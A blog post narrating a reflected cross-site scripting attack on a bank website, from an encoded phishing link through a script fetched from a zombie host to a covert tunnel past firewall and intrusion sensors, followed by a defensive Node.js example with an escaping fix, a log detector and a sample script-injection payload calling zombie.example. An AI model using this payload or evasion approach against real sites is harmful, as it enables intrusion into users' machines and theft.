So, part 2 is here; I have received several mails asking me to blog on this.
This attack is simulated with a Cross Site Scripting vulnerability, using www.bank.co.ke as the example. What happens is that the attacker discovers a flaw on the website where user input is reflected back into the page without being sanitized or encoded. www.bank.co.ke sits in the bank's server farm, inside the DMZ, well protected by the corporate firewall. In the server farm are the DB servers, mail servers, domain servers, the web server and so on.
So what happens is that the attacker injects code into the website through that flaw and convinces a tech support user to check the link out. The link carries the full website address, but the injected parts are encoded for disguise, and the IDPS (Intrusion Detection and Prevention System) sensors do not pick it up when it arrives in his mailbox.
The attacker has a remote zombie host serving an executable embedded in a JavaScript file, so he sends an encoded form of a URL like the one below (it needs to be encoded to get past the intrusion sensors and filters).
The sequence // --> is meant to comment out anything the page generates after that point. Then comes the next step of the payload: a script hosted on the attacking server, which has the exploit ready for the client. It is downloaded and executed on the user's PC. From there, we have an SSL-encrypted tunnel from inside the corporate LAN to the zombie server, driven from a command prompt. So the attacker can control the PC from his laptop, via the zombie, through a tunnel that is not detected at the firewall or the IDPS console.
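As an added example (not code from the original post), the following Node.js snippet shows the two sides of the flaw described above: a page that reflects user input unescaped, beside the same page with output encoding applied, and a log check that percent-decodes a request before matching so that an encoded injection like the one discussed is not missed the way a raw string match would miss it. The host zombie.example, the script name payload.js and the log lines are constructed for illustration.

```javascript
// Added example, not code from the original post: a reflected-XSS page in its
// vulnerable and hardened forms, and a log check that decodes a URL before
// matching so encoded injection is not missed. Plain Node.js, no dependencies.
// All hosts, file names and log lines below are constructed for illustration.

// A search page that echoes the "q" parameter back into the HTML (constructed).
function renderVulnerable(q) {
  // The raw parameter is inserted straight into the markup: the unsanitized
  // input flaw the post describes.
  return `<html><body><p>Results for: ${q}</p></body></html>`;
}

// Escape the five characters that matter for text placed between tags.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The hardened version: same page, but the parameter is output-encoded.
function renderHardened(q) {
  return `<html><body><p>Results for: ${escapeHtml(q)}</p></body></html>`;
}

// Would a browser see a script element in this page?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Percent-decode a URL up to a few times (double encoding is common) so the
// check below sees what the server and browser will eventually see.
function normalizeUrl(url) {
  let current = url;
  for (let round = 0; round < 3; round++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current);
    } catch (_err) {
      break; // malformed escape sequence: stop decoding, keep what we have
    }
    if (decoded === current) break;
    current = decoded;
  }
  return current;
}

// Crude signature used for the demonstration: a script tag or javascript: URL
// in the decoded request. Real deployments use a tuned rule set, not this.
const SCRIPT_PATTERN = /<script\b|javascript:/i;

function looksLikeScriptInjection(url) {
  return SCRIPT_PATTERN.test(normalizeUrl(url));
}

// Constructed access-log style lines: a benign search, then the same injected
// parameter once- and twice-encoded. Encoding is done here rather than typed
// by hand so the sample is exact.
const injected = '<script src="//zombie.example/payload.js"></script>';
function sampleLogLines() {
  return [
    "GET /search?q=" + encodeURIComponent("savings account rates") + " 200",
    "GET /search?q=" + encodeURIComponent(injected) + " 200",
    "GET /search?q=" + encodeURIComponent(encodeURIComponent(injected)) + " 200",
  ];
}

// Return the indexes of log lines whose decoded URL trips the signature.
function flagSuspiciousLines(lines) {
  const flagged = [];
  lines.forEach((line, index) => {
    const url = line.split(" ")[1] || "";
    if (looksLikeScriptInjection(url)) flagged.push(index);
  });
  return flagged;
}

// Demonstration when run directly: node xss_demo.js
if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable page contains script:", containsScriptElement(renderVulnerable(injected)));
  console.log("hardened page contains script:  ", containsScriptElement(renderHardened(injected)));
  const demoLines = sampleLogLines();
  console.log("raw-match flags:", demoLines.filter((l) => SCRIPT_PATTERN.test(l)).length);
  console.log("decoded-match flags:", flagSuspiciousLines(demoLines));
}
```

Run directly, the raw regex over the log lines flags nothing, because every angle bracket arrives as %3C or %253C; the decoded scan flags lines 1 and 2. The hardened page renders the same input as &lt;script ...&gt; text, which a browser displays rather than executes.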
There are many other ways to inject malicious code into websites, which can fully trick users into running the exploits without their consent. These attacks need to be obfuscated to get past AVs and intrusion sensors.
Questions and comments can be posted below. If you wish to know how much further the exploitation can go, please comment or mail me; I will be happy to write a full post as part 3.